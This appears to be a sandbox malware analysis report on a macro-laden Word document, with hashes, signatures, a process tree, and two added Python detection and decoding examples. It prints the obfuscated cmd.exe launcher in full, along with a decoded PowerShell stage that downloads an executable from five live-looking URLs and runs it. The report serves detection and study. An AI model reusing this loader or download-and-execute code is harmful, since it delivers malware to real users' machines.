Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-09-2024 03:13

General

  • Target

    ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc

  • Size

    126KB

  • MD5

    ffd7ed2ea278afe39daf3b7f6d4819d3

  • SHA1

    e7245488c6048d3a4bb0c7a49cacc1f2145330fb

  • SHA256

    04ae3026fc9502f115794757e29bef4a6ad6cf3047fb7b444b0ddbed9504c631

  • SHA512

    59ea97a02a17c1fe21b30dae6ebe206798943f9a8b245686420e33ac2da46f647000a67e2208eb2f63e4f7a32a7c0c76de65312dd7f9895fc74776e31468c726

  • SSDEEP

    3072:A8GhDS0o9zTGOZD6EbzCd3WiWCAWcWvfxa:eoUOZDlbe3WiWCAWcWvfxa

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    http://levifca.com/y0tYhnWQ
  • exe.dropper
    http://mfpvision.com/yAkPNiSmm6
  • exe.dropper
    http://haganelectronics.rubickdesigns.com/C96xSAAy2q
  • exe.dropper
    http://catairdrones.com/sMQ0n8nNun
  • exe.dropper
    http://radio312.com/mp0NHN4cHX

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs commands through the powershell.exe interpreter.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
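
The first signature above is a parent-child rule: Word has no business launching a command interpreter, while some children are routine (the 32-bit print driver host splwow64.exe appears as PID 2720 in the process tree of this report). The Python below is an added example, not the sandbox's own rule or code from the sample. It applies that rule to the five processes recorded in this report's Processes section, constructed here as (pid, parent pid, image) tuples with WINWORD.EXE's own parent set to 0 because the report does not record it, and additionally walks each interpreter's ancestry, which also catches the two powershell.exe instances whose direct parent is cmd.exe rather than WINWORD.EXE. The Office image set, the interpreter set and the allowlist of expected Office children are this example's assumptions.

```python
"""Parent-child check behind the 'Process spawned unexpected child process'
signature, run over this report's process tree. Added example; not the
sandbox's own rule."""

# The five processes recorded in the report, as (pid, parent pid, image path).
# Constructed from the report; the parent of WINWORD.EXE is not recorded, so 0.
EVENTS = [
    (2480, 0,    r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"),
    (2720, 2480, r"C:\Windows\splwow64.exe"),
    (2696, 2480, r"C:\Windows\SysWOW64\cmd.exe"),
    (3020, 2696, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    (2148, 3020, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
]

# Assumed sets for this example; tune them to the estate being monitored.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Children Office spawns in normal use; splwow64.exe is the 32-bit print driver host.
EXPECTED_OFFICE_CHILDREN = {"splwow64.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_ancestor(pid, by_pid):
    """PID of the nearest Office process above pid, or None. Cycle-safe."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur[0] not in seen:
        seen.add(cur[0])
        parent = by_pid.get(cur[1])
        if parent is None:
            return None
        if image_name(parent[2]) in OFFICE_IMAGES:
            return parent[0]
        cur = parent
    return None


def find_office_spawned_interpreters(events):
    """Return (direct, lineage): PIDs whose direct parent is an Office process
    and that are not an expected child, and interpreter PIDs that have any
    Office process among their ancestors."""
    by_pid = {pid: (pid, ppid, img) for pid, ppid, img in events}
    direct, lineage = [], []
    for pid, ppid, img in events:
        name = image_name(img)
        parent = by_pid.get(ppid)
        if parent and image_name(parent[2]) in OFFICE_IMAGES and name not in EXPECTED_OFFICE_CHILDREN:
            direct.append(pid)
        if name in INTERPRETERS and office_ancestor(pid, by_pid) is not None:
            lineage.append(pid)
    return direct, lineage


if __name__ == "__main__":
    direct, lineage = find_office_spawned_interpreters(EVENTS)
    print("unexpected direct children of Office:", direct)        # [2696]
    print("interpreters with Office in their lineage:", lineage)  # [2696, 3020, 2148]
```

The direct-parent form reproduces what the report tags (only cmd.exe, PID 2696, carries the signature); the lineage form is what to alert on in production, since the download and the second powershell.exe (PIDs 3020 and 2148) are two hops away from Word and a rule that looks only one level up never sees them.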

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2720
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2148
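
The cmd.exe line recorded for PID 2696 carries the PowerShell stage as a reversed string: `/V:O` turns on delayed variable expansion, `set lj=` stores the reversed text, and `for /L %9 in (475;-1;0)` walks the 476 character positions from last to first, appending one character (`!lj:~%9,1!`) to `Yfw` on each pass, so `Yfw` ends up holding the stage read forwards. When the counter reaches 0 it runs `powershell "!Yfw:*Yfw!=!"`, a substring-replace expression that evidently left the value untouched, since the command line recorded for the child (PID 3020) is exactly the reversed string. The Python below is an added example, not code from the report or from the sample. It recovers the stage from the cmd.exe command line by undoing the same reversal, checks the loop bound against the payload length, and then pulls the download URLs, the drop path and the size gate out of the decoded stage. The cmd.exe and powershell.exe command lines are copied from the two process entries above; the `%TEMP%` rendering of `$env:temp`, the IOC field names and the regular expressions are this example's own conventions.

```python
"""Recover the PowerShell stage hidden in the reversed-string cmd.exe launcher
(PID 2696 in the report) and pull the IOCs out of it. Added example; not code
from the report or the sample."""
import re

# Command line of PID 2696 as recorded in the report, split only to fit the page.
CMD_LINE = (
    r'"C:\Windows\system32\cmd.exe" /V:O/C"set lj='
    r";'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;"
    r"'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;"
    r"'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@"
    r"q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;"
    r"tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop"
    r'&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "'
)

# Argument of the child powershell.exe (PID 3020) as the report recorded it;
# the decoder's output is checked against this.
OBSERVED_STAGE2 = (
    r"powershell $vYz='Fak';$mad=new-object Net.WebClient;"
    r"$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@"
    r"http://haganelectronics.rubickdesigns.com/C96xSAAy2q@"
    r"http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');"
    r"$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';"
    r"foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';"
    r"If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}"
    r"$wwd='dfa';"
)

# set VAR=<payload>&&for /L %i in (N;-1;0)do set OUT=!OUT!!VAR:~%i,1!
LOADER_RE = re.compile(
    r"set (?P<var>\w+)=(?P<payload>.*?)"
    r"&&for /L %(?P<idx>\d) in \((?P<start>\d+);-1;0\)"
    r"do set (?P<out>\w+)=!(?P=out)!!(?P=var):~%(?P=idx),1!"
)


def decode_reversed_loader(cmd_line):
    """Undo the for /L character-by-character reversal and return the inner command."""
    m = LOADER_RE.search(cmd_line)
    if not m:
        raise ValueError("no reversed-string for /L loader in command line")
    payload, start = m.group("payload"), int(m.group("start"))
    # The loop runs start..0 inclusive, so it must cover exactly len(payload) characters.
    if start + 1 != len(payload):
        raise ValueError(f"loop bound {start} does not fit payload of {len(payload)} chars")
    return payload[::-1]


# Tokens of a PowerShell string concatenation: 'literal', $env:NAME, $name.
TOKEN_RE = re.compile(r"'(?P<lit>[^']*)'|\$env:(?P<env>\w+)|\$(?P<var>\w+)")


def resolve_concat(expr, literals):
    """Evaluate a '+'-joined string expression; $env:x is rendered as %X%
    (this example's convention, not a PowerShell behaviour)."""
    parts = []
    for t in TOKEN_RE.finditer(expr):
        if t.group("lit") is not None:
            parts.append(t.group("lit"))
        elif t.group("env") is not None:
            parts.append("%" + t.group("env").upper() + "%")
        else:
            parts.append(literals.get(t.group("var"), "$" + t.group("var")))
    return "".join(parts)


def extract_iocs(stage2):
    """URLs, resolved drop path and minimum-size gate from the decoded downloader."""
    urls = re.findall(r"https?://[^'\"@\s]+", stage2)
    # Plain literal assignments such as $vhI = '193'; the decoy variables land here too.
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'\s*;", stage2))
    drop_path = None
    target = re.search(r"\.DownloadFile\(\$\w+,\s*\$(\w+)\)", stage2)
    if target:
        assign = re.search(r"\$" + re.escape(target.group(1)) + r"\s*=\s*([^;]+);", stage2)
        if assign:
            drop_path = resolve_concat(assign.group(1), literals)
    gate = re.search(r"-ge\s+(\d+)", stage2)
    return {
        "urls": urls,
        "drop_path": drop_path,
        "min_size": int(gate.group(1)) if gate else None,
    }


if __name__ == "__main__":
    stage2 = decode_reversed_loader(CMD_LINE)
    print("decoder matches recorded child command line:", stage2 == OBSERVED_STAGE2)
    for key, value in extract_iocs(stage2).items():
        print(f"{key}: {value}")
```

The decoded stage matches the five URLs in the Malware Config section, resolves the drop target to `%TEMP%\193.exe`, and exposes the gate the signatures do not spell out: each URL is tried in turn and the file is only launched (`Invoke-Item`) once a download of at least 80000 bytes has landed, which skips short error pages from dead or sinkholed hosts and is why a sandbox with no network may record the downloads but no dropped executable.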

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      c40cfb7a24846558608d43ffc8eb2324

      SHA1

      0f3fe8cb7be0959512cc4a789cda6b04c8938998

      SHA256

      14f039f377c70d6d8afda3868c7279238d0adec38e9712692f41a658c8ff7c32

      SHA512

      98ef01424ffe26318ded9503faf68f3f4e8adc3db78e5e687eb314b770ee0d161a24b201d347c178bc085e360847ea35a31673d6078a6b18b708c52f6bd7648b

    • memory/2480-0-0x000000002F431000-0x000000002F432000-memory.dmp

      Filesize

      4KB

    • memory/2480-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2480-2-0x0000000073FBD000-0x0000000073FC8000-memory.dmp

      Filesize

      44KB

    • memory/2480-5-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2480-6-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2480-7-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2480-20-0x0000000073FBD000-0x0000000073FC8000-memory.dmp

      Filesize

      44KB

    • memory/2480-21-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/3020-16-0x0000000002AB0000-0x0000000002AEC000-memory.dmp

      Filesize

      240KB

    • memory/3020-18-0x00000000055C0000-0x0000000005618000-memory.dmp

      Filesize

      352KB